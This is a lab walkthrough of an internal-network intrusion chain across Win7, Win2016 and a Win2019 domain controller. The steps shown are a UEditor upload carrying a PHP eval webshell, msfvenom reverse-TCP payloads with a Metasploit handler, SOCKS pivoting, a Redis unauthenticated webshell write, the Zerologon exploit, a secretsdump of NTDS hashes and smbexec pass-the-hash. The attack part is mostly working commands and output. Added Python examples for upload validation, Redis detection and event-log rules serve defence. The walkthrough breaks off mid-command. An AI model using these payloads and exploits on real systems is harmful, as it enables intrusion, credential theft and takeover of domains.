Win7 privileges
Getting a shell via arbitrary file upload
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.159.129
Content-Length: 882
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
filename
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
10000
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
R4g1729585588321
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
.php
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="mufile"
submit
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="filename"; filename="R4g1729585588321.php"
R4g1729585588321<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['cmd']);?>
------WebKitFormBoundarymVk33liI64J7GQaK--
Of course, simply running a tool against it works too.
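The request above succeeds because the upload handler lets the client supply its own CONFIG[...] values, including the list of allowed extensions. The Python below is an added example, not code from the original write-up or from UEditor: it parses a multipart/form-data body and shows the server-side checks that close that gap (client-supplied CONFIG fields are ignored and treated as a signal, the real file name is validated against a server-side allowlist, and bodies carrying script tags are refused). SAMPLE_BODY and BENIGN_BODY are constructed from the request above with placeholder file contents; SERVER_ALLOWED_EXTENSIONS and SCRIPT_MARKERS are assumed policy for this example.

```python
"""Server-side inspection of a multipart upload like the one above.

Added example; not code from the original write-up or from UEditor.
The allowlist and storage policy live on the server; any CONFIG[...]
field the client sends is ignored and logged as a detection signal.
"""
import os
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed server-side policy for this example.
SERVER_ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}
# Markers that must never appear inside an image or document upload.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


@dataclass
class Part:
    name: str
    filename: Optional[str]
    body: bytes


@dataclass
class Verdict:
    allowed: bool = True
    reasons: List[str] = field(default_factory=list)


def parse_multipart(body: bytes, boundary: str) -> List[Part]:
    """Minimal multipart/form-data parser (CRLF line endings, as browsers send)."""
    delimiter = b"--" + boundary.encode()
    parts: List[Part] = []
    for chunk in body.split(delimiter):
        chunk = chunk.strip(b"\r\n")
        if not chunk or chunk == b"--":          # preamble or closing delimiter
            continue
        header_blob, _, part_body = chunk.partition(b"\r\n\r\n")
        headers = header_blob.decode("utf-8", "replace")
        name = re.search(r'[;\s]name="([^"]*)"', headers)   # not "filename="
        fname = re.search(r'filename="([^"]*)"', headers)
        if name is None:
            continue
        parts.append(Part(name.group(1), fname.group(1) if fname else None, part_body))
    return parts


def check_upload(parts: List[Part]) -> Verdict:
    verdict = Verdict()
    # 1. Client-controlled configuration is never honoured; its presence is recorded.
    overrides = [p.name for p in parts if p.name.startswith("CONFIG[")]
    if overrides:
        verdict.reasons.append(f"client attempted config override: {overrides}")
    # 2. Every file part is validated against the server-side policy.
    for part in parts:
        if part.filename is None:
            continue
        ext = os.path.splitext(part.filename.lower())[1]
        if ext not in SERVER_ALLOWED_EXTENSIONS:
            verdict.allowed = False
            verdict.reasons.append(f"extension {ext!r} not in server allowlist")
        if any(marker in part.body.lower() for marker in SCRIPT_MARKERS):
            verdict.allowed = False
            verdict.reasons.append(f"{part.filename!r}: content contains a script marker")
    return verdict


def inspect_request(body: bytes, boundary: str) -> Verdict:
    return check_upload(parse_multipart(body, boundary))


BOUNDARY = "----WebKitFormBoundarymVk33liI64J7GQaK"
D = b"------WebKitFormBoundarymVk33liI64J7GQaK\r\n"

# Constructed from the request above; the file content is a placeholder, not the webshell.
SAMPLE_BODY = (
    D + b'Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"\r\n\r\n.php\r\n'
    + D + b'Content-Disposition: form-data; name="filename"; filename="R4g1729585588321.php"\r\n\r\n'
    + b"<?php /* placeholder body */ ?>\r\n"
    + b"------WebKitFormBoundarymVk33liI64J7GQaK--\r\n"
)
# Constructed benign upload: no CONFIG fields, an allowed extension, image-like bytes.
BENIGN_BODY = (
    D + b'Content-Disposition: form-data; name="filename"; filename="photo.png"\r\n\r\n'
    + b"\x89PNG\r\n\x1a\n...\r\n"
    + b"------WebKitFormBoundarymVk33liI64J7GQaK--\r\n"
)

if __name__ == "__main__":
    for label, body in (("config-override upload", SAMPLE_BODY), ("benign upload", BENIGN_BODY)):
        v = inspect_request(body, BOUNDARY)
        print(label, "ALLOWED" if v.allowed else "REJECTED", v.reasons)
```

Storing accepted files under a server-generated name, in a directory the web server does not execute scripts from, removes the remaining risk that an allowed extension is later interpreted; the CONFIG[filePathFormat] field in the request above should likewise never influence the storage path.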
Win 2016 privileges
Bring Win7 online in CS as a backup
Generating the CS implant
Set up a listener
Generate an exe implant
Upload it with AntSword and run it; the host checks in
Redis unauthenticated access getshell
Checking in to MSF
Generate a reverse-connect payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=5555 -f exe > /root/555.exe
Upload and execute it via AntSword, with msf listening
┌──(root㉿kali)-[~]
└─# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.159.128
lhost => 192.168.159.128
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Sending stage (176198 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.129:56385) at 2024-10-23 20:11:15 +0800
meterpreter > ls
Listing: C:\tmp
===============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2024-10-23 20:06:58 +0800 555.exe
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) >
Add a route, set up a SOCKS proxy, and use arp to discover hosts on the internal segment
msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
SESSION 1 yes The session to run this module on
SUBNET no Subnet (IPv4, for example, 10.10.10.0)
View the full module info with the info, or info -d command.
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 1080 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > arp a
ARP cache
=========
IP address MAC address Interface
---------- ----------- ---------
10.0.20.1 00:50:56:c0:00:0b Intel(R) PRO/1000 MT Network Connection #2
10.0.20.99 00:0c:29:49:db:32 Intel(R) PRO/1000 MT Network Connection #2
10.0.20.254 00:50:56:f2:92:e5 Intel(R) PRO/1000 MT Network Connection #2
10.0.20.255 ff:ff:ff:ff:ff:ff Intel(R) PRO/1000 MT Network Connection #2
192.168.159.1 00:50:56:c0:00:08 Intel(R) PRO/1000 MT Network Connection
192.168.159.2 00:50:56:f4:36:2d Intel(R) PRO/1000 MT Network Connection
192.168.159.128 00:0c:29:cc:f9:72 Intel(R) PRO/1000 MT Network Connection
192.168.159.254 00:50:56:fe:c6:0b Intel(R) PRO/1000 MT Network Connection
192.168.159.255 ff:ff:ff:ff:ff:ff Intel(R) PRO/1000 MT Network Connection
224.0.0.22 00:00:00:00:00:00 Software Loopback Interface 1
224.0.0.22 01:00:5e:00:00:16 Intel(R) PRO/1000 MT Network Connection
224.0.0.22 01:00:5e:00:00:16 Intel(R) PRO/1000 MT Network Connection #2
224.0.0.22 01:00:5e:00:00:16 Bluetooth 设备(个人区域网)
224.0.0.252 00:00:00:00:00:00 Software Loopback Interface 1
224.0.0.252 01:00:5e:00:00:fc Intel(R) PRO/1000 MT Network Connection
224.0.0.252 01:00:5e:00:00:fc Intel(R) PRO/1000 MT Network Connection #2
239.255.255.250 00:00:00:00:00:00 Software Loopback Interface 1
239.255.255.250 01:00:5e:7f:ff:fa Intel(R) PRO/1000 MT Network Connection
239.255.255.250 01:00:5e:7f:ff:fa Intel(R) PRO/1000 MT Network Connection #2
255.255.255.255 ff:ff:ff:ff:ff:ff Intel(R) PRO/1000 MT Network Connection
255.255.255.255 ff:ff:ff:ff:ff:ff Intel(R) PRO/1000 MT Network Connection #2
255.255.255.255 ff:ff:ff:ff:ff:ff Bluetooth 设备(个人区域网)
Change the configuration
vi /etc/proxychains4.conf
Through the proxy, the unauthenticated Redis instance can now be reached directly.
Use the unauthenticated Redis together with the PHP web environment to get a shell.
Writing a webshell through the unauthenticated Redis
┌──(root㉿kali)-[~]
└─# proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>
Once the shell is written, configure a proxy in AntSword and connect.
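The redis-cli session above writes the RDB dump into the web root, which only works because the instance accepts CONFIG SET and SAVE from an unauthenticated client. The Python below is an added example, not part of the original write-up or of Redis: detect_rdb_webshell() replays lines in the format the Redis MONITOR command prints (or a command log of the same shape) and alerts when one client points dir at a web-root path, sets dbfilename to a script name and then saves; audit_redis_conf() flags the redis.conf settings that permit that sequence. SAMPLE_MONITOR, WEAK_CONF and HARDENED_CONF are constructed; WEBROOT_MARKERS, SCRIPT_EXTS and the 10.0.20.x client addresses are assumptions for this example.

```python
"""Detection and hardening checks for the Redis RDB write shown above.
Added example; not from the original write-up or from Redis."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# MONITOR line: <unix ts> [<db> <client addr>] "cmd" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')          # quoted, backslash-escaped arguments
WEBROOT_MARKERS = ("www", "htdocs", "wwwroot", "webapps", "public_html")   # assumed
SCRIPT_EXTS = (".php", ".jsp", ".jspx", ".asp", ".aspx")                    # assumed
SCRIPT_TAGS = ("<?php", "<?=", "<%")


def parse_monitor_line(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (client, [args]) for a MONITOR line, or None if it is not one."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group("client"), ARG_RE.findall(m.group("args"))


def detect_rdb_webshell(lines: List[str]) -> List[str]:
    """Per-client stateful detection of CONFIG SET dir/dbfilename followed by SAVE."""
    state: Dict[str, Dict[str, str]] = defaultdict(dict)
    alerts: List[str] = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        cmd = args[0].lower()
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set":
            key, value = args[2].lower(), args[3]
            if key in ("dir", "dbfilename"):          # runtime relocation of the dump file
                state[client][key] = value
                alerts.append(f"[medium] {client}: CONFIG SET {key} {value!r}")
        elif cmd in ("set", "setex", "append", "lpush", "rpush") and len(args) >= 3:
            if any(tag in args[-1].lower() for tag in SCRIPT_TAGS):
                alerts.append(f"[medium] {client}: script code stored as a value via {cmd.upper()}")
        elif cmd in ("save", "bgsave"):
            d = state[client].get("dir", "").lower()
            f = state[client].get("dbfilename", "").lower()
            if any(mark in d for mark in WEBROOT_MARKERS) and f.endswith(SCRIPT_EXTS):
                alerts.append(f"[high] {client}: RDB saved into web root {d!r} as {f!r} (webshell write)")
    return alerts


def audit_redis_conf(conf: str) -> List[str]:
    """Flag redis.conf settings that let an unauthenticated client perform the write above."""
    settings: Dict[str, List[str]] = defaultdict(list)
    for raw in conf.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            settings[key.lower()].append(value.strip())
    findings: List[str] = []
    if "requirepass" not in settings and "user" not in settings:
        findings.append("no requirepass and no ACL users: any client reaching the port can run CONFIG SET and SAVE")
    if settings.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode no: remote unauthenticated connections are accepted")
    if not settings.get("bind") or any("0.0.0.0" in b for b in settings["bind"]):
        findings.append("listening on all interfaces: bind to loopback or the internal interface only")
    renamed = {v.split()[0].lower() for v in settings.get("rename-command", []) if v.split()}
    if "config" not in renamed:
        findings.append('CONFIG not restricted: rename-command CONFIG "" (or deny it via ACL) blocks dir/dbfilename changes at runtime')
    return findings


SAMPLE_MONITOR = [   # constructed; mirrors the redis-cli sequence above, client addresses invented
    '1741500000.100000 [0 10.0.20.5:50212] "config" "set" "dir" "C:/phpStudy/PHPTutorial/WWW/"',
    '1741500001.200000 [0 10.0.20.5:50212] "config" "set" "dbfilename" "tx.php"',
    '1741500002.300000 [0 10.0.20.5:50212] "set" "1" "<?php /* placeholder */ ?>"',
    '1741500003.400000 [0 10.0.20.5:50212] "save"',
    '1741500004.500000 [0 10.0.20.7:40311] "get" "session:42"',   # unrelated client
]
WEAK_CONF = "# constructed: exposed lab instance\nbind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED_CONF = ("# constructed: hardened counterpart\nbind 127.0.0.1\nprotected-mode yes\n"
                 "requirepass REPLACE-WITH-LONG-RANDOM-SECRET\nrename-command CONFIG \"\"\n")

if __name__ == "__main__":
    print("\n".join(detect_rdb_webshell(SAMPLE_MONITOR)))
    print("weak:", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

Of the two, the configuration audit is the cheaper control: with authentication required and CONFIG disabled at runtime, the chain in the session above cannot start, and the MONITOR-based rule becomes a check on whether that policy is actually deployed.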
Checking in to CS
Right-click the Win7 host and choose pivot listener (转发上线)
Select the payload to generate, as shown in the figure
After this is set, a listener is created and started automatically
Getting privileges on Win2019
MSF bind connection through the proxy
Launch msf through the proxy. Note that only when it is launched through the proxy (proxychains msfconsole) can its traffic be forwarded into the internal network to Win2016.
┌──(root㉿kali)-[/zbug]
└─# proxychains msfconsole
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Metasploit tip: After running db_nmap, be sure to check out the result
of hosts and services
[proxychains] DLL init: proxychains-ng 4.17le.../
[proxychains] DLL init: proxychains-ng 4.17
msf6 > use exploit/multi/handler
[proxychains] DLL init: proxychains-ng 4.17
[*] Using configured payload generic/shell_reverse_tcp
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17
payload => windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > set lport 4444
[proxychains] DLL init: proxychains-ng 4.17
lport => 4444
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > set rhost 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
rhost => 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Started bind TCP handler against 10.0.20.99:4444
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:4444 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:4444 ... OK
[*] Sending stage (201798 bytes) to 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (127.0.0.1:59614 -> 127.0.0.1:1080) at 2025-03-09 15:30:20 +0800
[proxychains] DLL init: proxychains-ng 4.17
meterpreter >
Run the payload via AntSword
Add the route chain
meterpreter > run post/multi/manage/autoroute
[proxychains] DLL init: proxychains-ng 4.17
[*] Running module against WIN2016
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > run post/windows/gather/enum_domain
[proxychains] DLL init: proxychains-ng 4.17
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > bg
[proxychains] DLL init: proxychains-ng 4.17
[*] Backgrounding session 1...
[proxychains] DLL init: proxychains-ng 4.17
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
[proxychains] DLL init: proxychains-ng 4.17
msf6 auxiliary(server/socks_proxy) > set version 5
[proxychains] DLL init: proxychains-ng 4.17
version => 5
[proxychains] DLL init: proxychains-ng 4.17
msf6 auxiliary(server/socks_proxy) > set srvport 1081
[proxychains] DLL init: proxychains-ng 4.17
srvport => 1081
[proxychains] DLL init: proxychains-ng 4.17
msf6 auxiliary(server/socks_proxy) > options
[proxychains] DLL init: proxychains-ng 4.17
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 1081 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
[proxychains] DLL init: proxychains-ng 4.17
msf6 auxiliary(server/socks_proxy) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Auxiliary module running as background job 0.
[proxychains] DLL init: proxychains-ng 4.17
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) >
Once this is configured, continue by updating the proxy configuration file
vi /etc/proxychains4.conf
Use nmap to test whether the connection works
┌──(root㉿kali)-[/zbug]
└─# proxychains nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 18:56 CST
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:139 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:8080 <--socket error or timeout!
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:80 <--socket error or timeout!
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:6379 <--socket error or timeout!
Nmap scan report for 10.0.10.110
Host is up (0.14s latency).
PORT STATE SERVICE
80/tcp closed http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
6379/tcp closed redis
8080/tcp closed http-proxy
Nmap done: 1 IP address (1 host up) scanned in 45.37 seconds
Exploiting CVE-2020-1472
git clone https://github.com/dirkjanm/CVE-2020-1472.git
git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket && pip3 install .
Once the downloads finish, use CVE-2020-1472 to reset the domain controller's account password to an empty string
┌──(root㉿kali)-[/zbug/CVE-2020-1472]
└─# proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:49670 ... OK
=========================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
Use secretsdump.py to try to obtain the Administrator hash from the domain controller; the script is in the impacket/examples directory
┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains4 python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -just-dc -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:49667 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:9630d035ba860e59ca7a51ea39a48e97:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:9173b992970cde4cf92795ea2f57c82fc72752e261eb3f6db7fd385500da709a
WIN2016$:aes128-cts-hmac-sha1-96:2fdb26ae937ab6b24e0931ac928ab960
WIN2016$:des-cbc-md5:8cce51314fb95761
[*] Cleaning up...
Successfully obtained:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
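Two of the steps above leave distinct traces in the domain controller's Security log: the CVE-2020-1472 reset is a computer-account change (event 4742) performed by ANONYMOUS LOGON, and the DRSUAPI dump that secretsdump.py performs is a directory replication request (event 4662 whose Properties carry the DS-Replication-Get-Changes control-access rights). The Python below is an added example, not code from the original write-up or from impacket; it runs both rules over constructed Security-log records reduced to dicts. DC_ACCOUNTS and DC_IPS are taken from the enum_domain output above; the 10.0.10.99 source address is constructed (the page does not show the pivot host's address on the DC segment); the 4662 rule assumes Directory Service Access auditing is enabled.

```python
"""Detection for the Zerologon reset and the replication-based credential dump above.
Added example; not from the original write-up or from impacket."""
import re
from typing import Dict, List, Tuple

DC_ACCOUNTS = {"WIN2019$"}          # from the enum_domain output above
DC_IPS = {"10.0.10.110"}            # from the enum_domain output above

# Control-access rights that appear in the 4662 Properties field of a replication request.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",   # DS-Replication-Get-Changes-In-Filtered-Set
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

Event = Dict[str, object]   # simplified record: EventID plus the fields the rules need


def detect_dc_compromise(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule, detail) alerts. Events are processed in time order so the
    source address of a 4624 logon can be paired with the 4662 that follows it."""
    last_logon_ip: Dict[str, str] = {}
    alerts: List[Tuple[str, str]] = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        eid = e["EventID"]
        if eid == 4624:                                   # logon: remember where the account came from
            last_logon_ip[str(e["TargetUserName"]).upper()] = str(e.get("IpAddress", ""))
        elif eid == 4742:                                 # computer account changed
            subject = str(e.get("SubjectUserName", "")).upper()
            target = str(e.get("TargetUserName", "")).upper()
            if subject == "ANONYMOUS LOGON" and target in DC_ACCOUNTS and e.get("PasswordLastSet", "-") != "-":
                alerts.append(("ZEROLOGON", f"{target} password changed by ANONYMOUS LOGON"))
        elif eid == 4662:                                 # directory object access
            rights = {g.lower() for g in GUID_RE.findall(str(e.get("Properties", "")))}
            if not rights & REPLICATION_RIGHTS:
                continue
            subject = str(e.get("SubjectUserName", "")).upper()
            if subject not in DC_ACCOUNTS:
                alerts.append(("DCSYNC", f"replication requested by non-DC account {subject}"))
            else:
                ip = last_logon_ip.get(subject, "")
                if ip and ip not in DC_IPS:               # a DC account used from somewhere else
                    alerts.append(("DCSYNC", f"DC account {subject} replicating from non-DC address {ip}"))
    return alerts


REPL = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS: List[Event] = [   # constructed, simplified Security-log records
    # normal: the DC's own account replicating from the DC itself
    {"time": 1, "EventID": 4624, "TargetUserName": "WIN2019$", "LogonType": 3, "IpAddress": "10.0.10.110"},
    {"time": 2, "EventID": 4662, "SubjectUserName": "WIN2019$", "Properties": REPL},
    # Zerologon: an unauthenticated Netlogon session resets the DC account password
    {"time": 3, "EventID": 4624, "TargetUserName": "ANONYMOUS LOGON", "LogonType": 3, "IpAddress": "10.0.10.99"},
    {"time": 4, "EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "WIN2019$",
     "PasswordLastSet": "3/9/2025 3:31:02 PM"},
    # the emptied DC account is then used from the pivot host (constructed address) to pull NTDS secrets
    {"time": 5, "EventID": 4624, "TargetUserName": "WIN2019$", "LogonType": 3, "IpAddress": "10.0.10.99"},
    {"time": 6, "EventID": 4662, "SubjectUserName": "WIN2019$", "Properties": REPL},
    # unrelated object read by a domain user: no replication rights in Properties
    {"time": 7, "EventID": 4662, "SubjectUserName": "win2016", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for rule, detail in detect_dc_compromise(SAMPLE_EVENTS):
        print(rule, detail)
```

Because the dump in this write-up authenticates as WIN2019$ itself, a rule that simply exempts DC computer accounts from the 4662 check stays silent; pairing the request with the source address of the preceding 4624 logon is what catches it here. On domain controllers with the Netlogon fix installed, the attempt also logs events 5827/5828 (vulnerable secure-channel connection denied) or 5829 (allowed during the enforcement grace period), which are worth alerting on directly.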
In the same directory, use smbexec.py to get a shell on the domain controller
┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
